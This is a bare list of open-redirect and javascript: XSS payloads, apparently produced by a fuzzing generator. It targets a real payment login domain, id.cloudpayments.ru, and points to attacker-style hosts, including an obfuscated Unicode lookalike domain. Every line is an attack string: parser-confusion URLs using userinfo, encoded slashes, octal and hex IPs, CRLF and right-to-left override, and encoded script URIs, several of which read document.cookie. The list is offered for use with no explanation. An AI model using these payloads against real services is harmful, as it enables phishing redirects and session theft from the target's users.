\/\/google.com/
\/\/localdomain.pw/
\/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
\152\141\166\141\163\143\162\151\160\164\072alert(1)
\\google.com
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:id.cloudpayments.ru;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
http:%0a%0dlocaldomain.pw
http:%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://.localdomain.pw
http://.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:///////////google.com
http://00330.00072.0000326.00000316
http://00330.0x3a.54990
http://00330.3856078
http://0330.072.0326.0316
http://0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http://0xd83ad6ce
http://3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@example.com+@google.com/
http://3H6k7lIAiqjfNeN@example.com@google.com/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ru+@localdomain.pw/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ru+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ru@localdomain.pw/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ruâº@localdomain.pw/
http://3H6k7lIAiqjfNeN@id.cloudpayments.ruâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://472.314.470.462
http://;@google.com
http://;@localdomain.pw
http://;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://XY>.7d8T\205pZM@id.cloudpayments.ru+@localdomain.pw/
http://XY>.7d8T\205pZM@id.cloudpayments.ru+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@id.cloudpayments.ru@localdomain.pw/
http://XY>.7d8T\205pZM@id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@id.cloudpayments.ruâº@localdomain.pw/
http://XY>.7d8T\205pZM@id.cloudpayments.ruâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://example.com%2egoogle.com/
http://example.com+&@google.com#+@example.com/
http://example.com:80%40google.com/
http://example.com@00330.00072.0000326.00000316
http://example.com@00330.0x3a.54990
http://example.com@00330.3856078
http://example.com@0330.072.0326.0316
http://example.com@0xd8.072.54990
http://example.com@0xd8.0x3a.0xd6.0xce
http://example.com@0xd8.3856078
http://example.com@0xd83ad6ce
http://example.com@3627734734
http://example.com@472.314.470.462
http://example.com@[::216.58.214.206]
http://example.com@[::ffff:216.58.214.206]
http://google.com%23.example.com/
http://google.com%2f%2f.example.com/
http://google.com%3F.example.com/
http://google.com%5c%5c.example.com/
http://google.com&id.cloudpayments.ru
http://google.com:80#@example.com/
http://google.com:80#@id.cloudpayments.ru/
http://google.com:80?@example.com/
http://google.com:80?@id.cloudpayments.ru/
http://google.com\texample.com/
http://google.com\id.cloudpayments.ru
http://localdomain.pw%23.id.cloudpayments.ru/
http://localdomain.pw%2f%2f.id.cloudpayments.ru/
http://localdomain.pw%3F.id.cloudpayments.ru/
http://localdomain.pw%5c%5c.id.cloudpayments.ru/
http://localdomain.pw:80#@id.cloudpayments.ru/
http://localdomain.pw:80?@id.cloudpayments.ru/
http://localdomain.pw\tid.cloudpayments.ru/
http://www.localdomain.pw\.id.cloudpayments.ru
http://id.cloudpayments.ru%2elocaldomain.pw/
http://id.cloudpayments.ru%2eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://id.cloudpayments.ru+&@localdomain.pw#+@id.cloudpayments.ru/
http://id.cloudpayments.ru+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@id.cloudpayments.ru/
http://id.cloudpayments.ru.google.com
http://id.cloudpayments.ru:80%40localdomain.pw/
http://id.cloudpayments.ru:80%40â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://id.cloudpayments.ru@00330.00072.0000326.00000316
http://id.cloudpayments.ru@00330.0x3a.54990
http://id.cloudpayments.ru@00330.3856078
http://id.cloudpayments.ru@0330.072.0326.0316
http://id.cloudpayments.ru@0xd8.072.54990
http://id.cloudpayments.ru@0xd8.0x3a.0xd6.0xce
http://id.cloudpayments.ru@0xd8.3856078
http://id.cloudpayments.ru@0xd83ad6ce
http://id.cloudpayments.ru@3627734734
http://id.cloudpayments.ru@472.314.470.462
http://id.cloudpayments.ru@[::216.58.214.206]
http://id.cloudpayments.ru@[::ffff:216.58.214.206]
http://id.cloudpayments.ruâº&@localdomain.pw#âº@id.cloudpayments.ru/
http://id.cloudpayments.ruâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@id.cloudpayments.ru/
http://www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.id.cloudpayments.ru
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23.id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%3F.id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%5c%5c.id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@id.cloudpayments.ru/
http://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\tid.cloudpayments.ru/
http://ï¹”@localdomain.pw
http://ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/localdomain.pw
http:/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:00330.00072.0000326.00000316
http:00330.0x3a.54990
http:00330.3856078
http:0330.072.0326.0316
http:0xd8.072.54990
http:0xd8.0x3a.0xd6.0xce
http:0xd8.3856078
http:0xd83ad6ce
http:3627734734
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:472.314.470.462
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:example.com@00330.00072.0000326.00000316
http:example.com@00330.0x3a.54990
http:example.com@00330.3856078
http:example.com@0330.072.0326.0316
http:example.com@0xd8.072.54990
http:example.com@0xd8.0x3a.0xd6.0xce
http:example.com@0xd8.3856078
http:example.com@0xd83ad6ce
http:example.com@3627734734
http:example.com@472.314.470.462
http:example.com@[::216.58.214.206]
http:example.com@[::ffff:216.58.214.206]
http:localdomain.pw
http:id.cloudpayments.ru@00330.00072.0000326.00000316
http:id.cloudpayments.ru@00330.0x3a.54990
http:id.cloudpayments.ru@00330.3856078
http:id.cloudpayments.ru@0330.072.0326.0316
http:id.cloudpayments.ru@0xd8.072.54990
http:id.cloudpayments.ru@0xd8.0x3a.0xd6.0xce
http:id.cloudpayments.ru@0xd8.3856078
http:id.cloudpayments.ru@0xd83ad6ce
http:id.cloudpayments.ru@3627734734
http:id.cloudpayments.ru@472.314.470.462
http:id.cloudpayments.ru@[::216.58.214.206]
http:id.cloudpayments.ru@[::ffff:216.58.214.206]
http:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https%3A/:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@id.cloudpayments.ru
https%3A/;@localdomain.pw
https%3A/localdomain.pw
https%3A/www.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\.id.cloudpayments.ru
https%3A/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%2f%2f.id.cloudpayments.ru/
https%3A/ï¹”@localdomain.pw
https:/%5clocaldomain.pw/
https:/%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%09/example.com@google.com
https://%09/google.com
https://%09/localdomain.pw
https://%09/id.cloudpayments.ru@google.com
https://%09/id.cloudpayments.ru@localdomain.pw
https://%09/id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dlocaldomain.pw
https://%0a%0dâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5cexample.com@google.com
https://%5cgoogle.com
https://%5clocaldomain.pw
https://%5cid.cloudpayments.ru@google.com
https://%5cid.cloudpayments.ru@localdomain.pw
https://%5cid.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https:///example.com@google.com/%2e%2e
https:///example.com@google.com/%2f%2e%2e
https:///google.com/%2e%2e
https:///google.com/%2f%2e%2e
https:///localdomain.pw/%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https:///id.cloudpayments.ru@localdomain.pw/%2e%2e
https:///id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
https:///id.cloudpayments.ru@www.google.com/%2e%2e
https:///id.cloudpayments.ru@www.google.com/%2f%2e%2e
https:///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://:@google.com\@example.com
https://:@google.com\@id.cloudpayments.ru
https://:@localdomain.pw\@id.cloudpayments.ru
https://:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@id.cloudpayments.ru
https://example.com/https://google.com/
https://example.com@google.com
https://example.com@google.com/
https://example.com@google.com/%2e%2e%2f
https://example.com@google.com/%2f%2e%2e
https://example.com@google.com/%2f..
https://example.com@google.com//
https://google.com
https://google.com/
https://google.com/%2e%2e%2f
https://google.com/%2f%2e%2e
https://google.com/%2f..
https://google.com//
https://localdomain.pw
https://localdomain.pw/
https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f..
https://localdomain.pw//
https://localdomain.pw/id.cloudpayments.ru
https://localdomain.pw\udfff@id.cloudpayments.ru/
https://localdomain.pwï¿½@id.cloudpayments.ru/
https://localdomainï½¡pw\áµ—id.cloudpayments.ru
https://www.google.com/%2e%2e%2f
https://www.google.com/%2f%2e%2e
https://id.cloudpayments.ru%09.localdomain.pw
https://id.cloudpayments.ru%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru%252elocaldomain.pw
https://id.cloudpayments.ru%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru%40%E2%80%AE@localdomain.pw
https://id.cloudpayments.ru%40%E2%80%AE@wp.niamodlacol
https://id.cloudpayments.ru%40%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru/https://localdomain.pw/
https://id.cloudpayments.ru/https://www.google.com/
https://id.cloudpayments.ru/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://id.cloudpayments.ru;@localdomain.pw
https://id.cloudpayments.ru;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru@%E2%80%AE@localdomain.pw
https://id.cloudpayments.ru@%E2%80%AE@wp.niamodlacol
https://id.cloudpayments.ru@%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru@'#localdomain.pw
https://id.cloudpayments.ru@'#â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru@/%E2%80%AE@localdomain.pw
https://id.cloudpayments.ru@/%E2%80%AE@wp.niamodlacol
https://id.cloudpayments.ru@/%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru@google.com
https://id.cloudpayments.ru@google.com/
https://id.cloudpayments.ru@google.com/%2f..
https://id.cloudpayments.ru@google.com//
https://id.cloudpayments.ru@localdomain.pw
https://id.cloudpayments.ru@localdomain.pw/
https://id.cloudpayments.ru@localdomain.pw/%2e%2e%2f
https://id.cloudpayments.ru@localdomain.pw/%2f%2e%2e
https://id.cloudpayments.ru@localdomain.pw/%2f..
https://id.cloudpayments.ru@localdomain.pw//
https://id.cloudpayments.ru@www.google.com/%2e%2e%2f
https://id.cloudpayments.ru@www.google.com/%2f%2e%2e
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://id.cloudpayments.ru@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://id.cloudpayments.ruï¹”@localdomain.pw
https://id.cloudpayments.ruï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://id.cloudpayments.ruï½¡â‚¨/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/id.cloudpayments.ru
https:google.com
https:localdomain.pw
https:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ja&#x0000A;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&Tab;vascript:alert(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
jaVAscript://id.cloudpayments.ru//%0d%0aalert(1);//
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
java&#x73;cript:alert()
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascripT://id.cloudpayments.ru/%250d%250aalert(document.cookie)
javascript&#58;alert(1)
javascript&#x0003A;alert()
javascript&#x3A;alert()
javascript&colon;alert()
javascript:%0aalert`1`
javascript:%250Aalert(1)
javascript:%61%6c%65%72%74%28%29
javascript://%0aalert(1)
javascript://%0aalert`1`
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript://https://id.cloudpayments.ru/?z=%0Aalert(1)
javascript://sub.domain.com/%0Aalert(1)
javascript://whitelisted.com?%a0alert%281%29
javascript://id.cloudpayments.ru?%a0alert%281%29
javascript:\u0061\u006C\u0065\u0072\u0074``
javascript:a\u006Cert``"
javascript:al&#x65;rt``
javascript:alert%60%60
javascript:alert&lpar;&rpar;
javascript:alert(1)
javascript:alert(1)//https://id.cloudpayments.ru
javascript:alert(1)//localdomain.pw/
javascript:alert(1)//id.cloudpayments.ru/
javascript:alert(1);
javascript:alert(document.domain)//://
javascript:confirm(1)
javascript:new%20Function`al\ert\`1\``;
javascript:prompt(1)
javascript:x='%27-alert(1)-%27';
localdomain.pw/id.cloudpayments.ru
id.cloudpayments.ru%09.localdomain.pw
id.cloudpayments.ru%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
id.cloudpayments.ru%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
id.cloudpayments.ru%252elocaldomain.pw
id.cloudpayments.ru%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
id.cloudpayments.ru;@localdomain.pw
id.cloudpayments.ru;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
id.cloudpayments.ruï¹”@localdomain.pw
id.cloudpayments.ruï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
Â°/localdomain.pw
Â°/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/id.cloudpayments.ru
ã€±google.com
ã€±localdomain.pw
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µgoogle.com
ã€µlocaldomain.pw
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚google.com
ã‚localdomain.pw
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼google.com
ãƒ¼localdomain.pw
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°google.com
ï½°localdomain.pw
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦